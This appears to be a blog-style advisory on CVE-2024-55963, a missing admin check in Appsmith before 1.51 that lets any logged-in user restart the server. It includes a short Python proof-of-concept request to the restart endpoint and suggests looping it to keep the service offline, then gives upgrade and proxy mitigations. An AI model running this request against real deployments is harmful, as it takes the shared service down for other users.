CVE-2024-55963 - Appsmith Pre-1.51 Faulty Access Control Lets Regular Users Restart the Server

A serious oversight has been found in Appsmith, a popular open-source platform for building internal tools, before version 1.51. Due to weak access control checks on a sensitive API, any logged-in user could restart the Appsmith server—even if they weren't an admin. For teams using Appsmith for critical operations, this means any unprivileged user could cause a denial of service simply by hitting an endpoint over and over. The restart only affects the Appsmith container/server, but the impact is pretty disruptive.

Product Affected: Appsmith before v1.51

- Type: Missing Authorization Check / Privilege Escalation

Impact: Authenticated non-admin users can restart the Appsmith server container via API

- CVE Link: NVD - CVE-2024-55963

The Root Cause

The /api/v1/admin/restart endpoint (and similar) only checked if the user was authenticated, not if they had admin or superuser privileges. Anyone logged into Appsmith could trigger a full restart of the server that everyone was using.

Attacker sends an HTTP request to the restart endpoint:

- Endpoint: /api/v1/admin/restart

Let's see what this would look like using Python and the requests library

import requests

# Assume you have a user's session cookie or JWT token after logging in
BASE_URL = "http://your-appsmith-instance.com";
RESTART_ENDPOINT = "/api/v1/admin/restart"

SESSION = requests.Session()
SESSION.cookies.set("your-session-cookie-name", "your-session-cookie-value")

# Send the POST request to the restart endpoint
response = SESSION.post(BASE_URL + RESTART_ENDPOINT)

if response.status_code == 200:
    print("Server restart triggered!")
else:
    print(f"Error: {response.status_code} - {response.text}")

Note: It doesn't matter if you are a regular user—if you are authenticated, this will work on vulnerable Appsmith versions.

Automate this in a loop, and the server will be stuck in constant restart hell—effectively offline.

Especially risky for deployments with many non-admin users

Note: This affects only the Appsmith app container, not your whole system. But denial of service is denial of service, even in just one app.

How to Fix

Upgrade!
Appsmith has patched this issue. Upgrade to version 1.51 or later.

- Appsmith Release Notes: Github Release
- Official Security Announcement *(replace with final advisory link when available)*

If you can’t upgrade immediately, block access to the restart API by using a reverse proxy or API gateway to allow only admins to hit that endpoint.

References and More Info

- CVE-2024-55963 on NVD
- Appsmith Github
- Appsmith Releases

Final Thoughts

CVE-2024-55963 is a classic example of "*authentication* isn't enough—*authorization* matters!" If you’re an Appsmith admin, check your version, patch ASAP, and take a quick look at your other internal tools for similar flaws. Sometimes impacts stay inside a single container, but downtime always causes real headaches.

Stay vigilant and patch your platforms!

*Written exclusively based on the disclosed information and simplified for clarity. For any questions or responsible disclosure concerns, contact the Appsmith team via their security reporting process.*

Timeline

Published on: 03/26/2025 20:15:21 UTC
Last modified on: 04/01/2025 16:34:41 UTC